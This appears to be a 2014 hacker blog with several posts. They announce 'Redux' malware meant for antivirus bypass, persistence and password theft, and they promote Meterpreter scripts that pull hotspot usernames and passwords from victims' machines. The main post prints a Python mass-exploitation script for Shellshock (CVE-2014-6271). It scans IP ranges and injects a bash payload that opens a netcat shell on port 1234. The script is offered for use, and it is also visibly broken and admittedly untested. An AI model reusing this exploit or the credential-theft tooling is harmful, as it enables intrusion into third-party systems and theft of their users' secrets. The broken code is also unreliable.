Saturday, 22 November 2014

Redux Malware.

Sup Peeps,

Recently working on a Malware named 'Redux', it will be one hell of a good one(Hope So), it is still in initial development phase.

it will be having a lot of 'features' such as :-

-> AV Bypass
-> Persistent Access
-> Stealing Information (Passwords, Hashes etc)
-> The biggest, that is integrated with one and only love 'Metasploit'.
And many more to come.

In video below, i have shown two of em, that is AV bypass and Permanent Access.

So, Enjoy the video and i will catch ya guys later. :)

Monday, 27 October 2014


Hello folks, 
Here is another one of my developed tool on which recently i am working on, i named it T!ny HoneyPot for now.
Why T!ny, because despite of it's small size, it works like a beast. 

So What is HoneyPot ? 
Straight Words, Honeypot is generally a tool that helps one to setup up a booby trap to detect unauthorized access in his/her system.

Working :- 
T!ny Honeypot helps users to setup a booby trap in just one click thus a wonderful method that helps to keep skids away.

it also includes features like - 

- > Shows Real Time Activity on system.
-> Saves Results every time into a log file.
*Future Implementation* - Auto Scan and Tries various exploits to attacking systems.
and Much More.

This project is still undergoing some development phases download link will be Ava liable Soon :)

Till then, Enjoy this video and i will catch ya guys later (:


Saturday, 27 September 2014


Sup guys,
As everyone knows, CVE-2014-6271 is recent hot topic now a days, so decided to contribute something to hacker community related to it.

Topic related to CVE-2014-6271 :-

Note:- The script i used is not mine, i have just modified it for better use, modifications done will allow us to :-
-> scan various ranges of provided IP for CVE-2014-6271 Vulnerability.
-> if a vulnerable host is found, it is exploited, and reverse shell is waiting on port 1234 ;)

Code is Below :-

#CVE-2014-6271 cgi-bin reverse shell
# NOTE :- This Script is not Mine, Just modded it for better use. ~ Un_N0n
import httplib,urllib
print '\tCVE-2014-6271 mass exploitation tool\n'
print '\tReverse shell returned on port 1234 ;) *We Love Shells*\n'
url = raw_input("Enter The First Three Octets To Scan [Example :] : ")
finput = input("Enter the Starting IP of Range to Scan  : ")
sinput = input("Enter the Ending IP of Range to Scan for : ")
path = raw_input("Enter Vuln CGI Path : ")
for x in range(finput,sinput + 1):
    murl = url + "." + str(x)
    conn = httplib.HTTPConnection(murl)
    reverse_shell="() { ignored;};/bin/bash -c '/bin/rm -f /tmp/f; /usr/bin/mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc -l 1234 > /tmp/f'"
    headers = {"Content-type": "application/x-www-form-urlencoded",
        "test": reverse_shell}
    res = conn.getresponse()
    if str(res.status) == '200':
        print "[+] Website Present and Payload Successfully Sent To " + murl + path
        data =
        print data
        print "[!]" + murl + path + " Is Not Vulnerable."
Download Link: -
TBH, i havn't tested this code yet, try once, if any error or bug let me know, hope ya all will like it. (:

Thank you.

Wednesday, 17 September 2014

Hotspots_Pawner.rb V 1.0 [ Hack Hotspots Passwords ]

*This script is of course open source as it is part of metasploit framework but if anyone want to use the code from my script, please let me know*

*Wanna Contribute? Most Welcome.*

So as i mentioned in my previous post about hotspots_pawner,

So here you go,

it's not yet fully done, just a start.

This scripts helps a hacker/pentester in post exploitation phase, it simply gives ya all passwords and usernames on victim machine if he/she is using a Hotspot software for creating a hotspot on his/here machine.

 Usage :- 

In download, you will find two files, one is 'hotspot_pawner.rb' and other is 'path_search.txt'.

Copy both of em in metasploit's "meterpreter/script" folder.

Get a session, do the following :- 

run hotspots_pawner.rb -h 

Press enter, then see if script is working, if yes, cool, and that is pretty much it, your ready to go.

Attention :- 


if after running script, you see this txt file on desktop, don't panic , its normal, this script saves the extracted paths to this TXT file. :)
*you can delete it before running script again or let it be there.

this scripts supports recursive search as well as normal search.

Before downloading be sure to check video :) 

Download link :-

Sunday, 7 September 2014


Sup all, 

Here is one of the script i am working on presently, just one 'run' command in meterpreter, hacks almost every well-known hotspot softwares and gives ya list of usernames and passwords that is being used on victim's machine, This script will provide you every detail like SSIDs, network type used, username, passwords, well it is kind of useful if used at right place, here is one video of it, currently, this script is under development, i am working to make it more stealthy.

Download link will be Ava liable Soon plus in depth explanation of how this script works.

Enjoy the video and i will catch ya guys later :)